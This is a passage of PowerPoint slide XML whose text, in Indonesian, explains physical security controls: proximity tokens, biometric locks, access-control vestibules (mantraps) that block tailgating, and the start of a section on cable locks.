              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> fob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses (Mantra)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mantra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewatinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pintu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasuki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pintu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuntuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kabel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
